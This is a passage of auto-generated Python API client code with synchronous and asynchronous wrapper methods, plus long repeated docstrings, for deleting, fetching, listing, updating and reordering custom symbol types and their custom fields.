_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.delete_custom_symbol_type_async_endpoint.call_with_http_info(**kwargs)
def delete_custom_symbol_type_async_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[None]":
"""Delete a Custom symbol type # noqa: E501
        This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to delete associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[None]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.delete_custom_symbol_type_async_endpoint.call_with_http_info(**kwargs)
def delete_custom_symbol_type_async_with_http_info_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[typing.Tuple[None, int, typing.MutableMapping]]":
"""Delete a Custom symbol type # noqa: E501
        This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to delete associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(None, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.delete_custom_symbol_type_async_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_type(
self,
custom_symbol_type_id,
**kwargs
) -> CustomSymbolTypeDetailDto:
"""Get a specific Custom symbol type's details # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
CustomSymbolTypeDetailDto
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_type_with_http_info(
self,
custom_symbol_type_id,
**kwargs
) -> typing.Tuple[CustomSymbolTypeDetailDto, int, typing.MutableMapping]:
"""Get a specific Custom symbol type's details # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
CustomSymbolTypeDetailDto
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_type_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[CustomSymbolTypeDetailDto]":
"""Get a specific Custom symbol type's details # noqa: E501
        This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[CustomSymbolTypeDetailDto]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_type_with_http_info_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[typing.Tuple[CustomSymbolTypeDetailDto, int, typing.MutableMapping]]":
"""Get a specific Custom symbol type's details # noqa: E501
        This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(CustomSymbolTypeDetailDto, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_types(
self,
**kwargs
) -> [CustomSymbolTypeDto]:
"""Get all the custom symbol types # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
[CustomSymbolTypeDto]
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.get_custom_symbol_types_endpoint.call_with_http_info(**kwargs)
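    # Illustrative usage sketch: the list endpoint takes no required arguments and
    # returns a list of CustomSymbolTypeDto objects.
    #
    #   for symbol_type in api.get_custom_symbol_types():
    #       print(symbol_type)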
def get_custom_symbol_types_with_http_info(
self,
**kwargs
) -> typing.Tuple[[CustomSymbolTypeDto], int, typing.MutableMapping]:
"""Get all the custom symbol types # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
[CustomSymbolTypeDto]
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.get_custom_symbol_types_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_types_async(
self,
**kwargs
) -> "ApplyResult[[CustomSymbolTypeDto]]":
"""Get all the custom symbol types # noqa: E501
        This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[[CustomSymbolTypeDto]]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.get_custom_symbol_types_endpoint.call_with_http_info(**kwargs)
def get_custom_symbol_types_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[[CustomSymbolTypeDto], int, typing.MutableMapping]]":
"""Get all the custom symbol types # noqa: E501
This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[([CustomSymbolTypeDto], int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.get_custom_symbol_types_endpoint.call_with_http_info(**kwargs)
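# Usage sketch (editor's illustration, hedged): the client class name below is
# assumed, not confirmed by this file -- e.g. api = CustomSymbolTypesApi(client).
# All four variants route through the same endpoint object:
#
#     types = api.get_custom_symbol_types(_request_timeout=(3.05, 27))
#     data, status, headers = api.get_custom_symbol_types_with_http_info()
#     result = api.get_custom_symbol_types_async()   # multiprocessing ApplyResult
#     types = result.get()                           # block until the data arrives
#
# The (3.05, 27) tuple sets separate connection and read timeouts, matching the
# _request_timeout semantics documented above.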
def get_symbol_custom_fields_for_custom_symbol_type(
self,
custom_symbol_type_id,
**kwargs
) -> [CustomSymbolCustomFieldConfigDto]:
"""Get Custom fields for Custom Symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated Custom fields
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
[CustomSymbolCustomFieldConfigDto]
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_symbol_custom_fields_for_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_symbol_custom_fields_for_custom_symbol_type_with_http_info(
self,
custom_symbol_type_id,
**kwargs
) -> typing.Tuple[[CustomSymbolCustomFieldConfigDto], int, typing.MutableMapping]:
"""Get Custom fields for Custom Symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated Custom fields
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
[CustomSymbolCustomFieldConfigDto]
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_symbol_custom_fields_for_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_symbol_custom_fields_for_custom_symbol_type_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[[CustomSymbolCustomFieldConfigDto]]":
"""Get Custom fields for Custom Symbol type # noqa: E501
This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated Custom fields
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[[CustomSymbolCustomFieldConfigDto]]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_symbol_custom_fields_for_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_symbol_custom_fields_for_custom_symbol_type_with_http_info_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[typing.Tuple[[CustomSymbolCustomFieldConfigDto], int, typing.MutableMapping]]":
"""Get Custom fields for Custom Symbol type # noqa: E501
This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated Custom fields
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[([CustomSymbolCustomFieldConfigDto], int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_symbol_custom_fields_for_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
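# Usage sketch (hedged): custom_symbol_type_id is the one positional argument;
# it is merged into kwargs before the endpoint call, so it combines freely with
# the per-request keyword options documented above. The id value is illustrative:
#
#     fields = api.get_symbol_custom_fields_for_custom_symbol_type(
#         "my-type-id",
#         _check_return_type=False,   # e.g. skip response type validation
#     )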
def update_custom_symbol_type(
self,
custom_symbol_type_id,
**kwargs
) -> None:
"""Edit a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
custom_symbol_type_id (str): customSymbolTypeId to update associated record
Keyword Args:
update_custom_symbol_type_dto (UpdateCustomSymbolTypeDto): updateCustomSymbolTypeDto object to update. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.update_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_with_http_info(
self,
custom_symbol_type_id,
**kwargs
) -> typing.Tuple[None, int, typing.MutableMapping]:
"""Edit a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
custom_symbol_type_id (str): customSymbolTypeId to update associated record
Keyword Args:
update_custom_symbol_type_dto (UpdateCustomSymbolTypeDto): updateCustomSymbolTypeDto object to update. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.update_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[None]":
"""Edit a Custom symbol type # noqa: E501
This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to update associated record
Keyword Args:
update_custom_symbol_type_dto (UpdateCustomSymbolTypeDto): updateCustomSymbolTypeDto object to update. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[None]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.update_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_with_http_info_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[typing.Tuple[None, int, typing.MutableMapping]]":
"""Edit a Custom symbol type # noqa: E501
This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to update associated record
Keyword Args:
update_custom_symbol_type_dto (UpdateCustomSymbolTypeDto): updateCustomSymbolTypeDto object to update. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(None, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.update_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
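# Usage sketch (hedged): the request body travels in the optional
# update_custom_symbol_type_dto keyword; the DTO fields are defined elsewhere,
# so the constructor call here is purely illustrative:
#
#     dto = UpdateCustomSymbolTypeDto(...)
#     api.update_custom_symbol_type("my-type-id", update_custom_symbol_type_dto=dto)
#
# The plain sync variant returns None on success; use the *_with_http_info
# variant when the HTTP status code needs to be inspected.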
def update_custom_symbol_type_order(
self,
**kwargs
) -> None:
"""update_custom_symbol_type_order # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
reorder_custom_symbol_type_dto (ReorderCustomSymbolTypeDto): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.update_custom_symbol_type_order_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_order_with_http_info(
self,
**kwargs
) -> typing.Tuple[None, int, typing.MutableMapping]:
"""update_custom_symbol_type_order # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
reorder_custom_symbol_type_dto (ReorderCustomSymbolTypeDto): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.update_custom_symbol_type_order_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_order_async(
self,
**kwargs
) -> "ApplyResult[None]":
"""update_custom_symbol_type_order # noqa: E501
This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
reorder_custom_symbol_type_dto (ReorderCustomSymbolTypeDto): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[None]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.update_custom_symbol_type_order_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_order_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[None, int, typing.MutableMapping]]":
"""update_custom_symbol_type_order # noqa: E501
This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
reorder_custom_symbol_type_dto (ReorderCustomSymbolTypeDto): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(None, int, typing.Dict)]
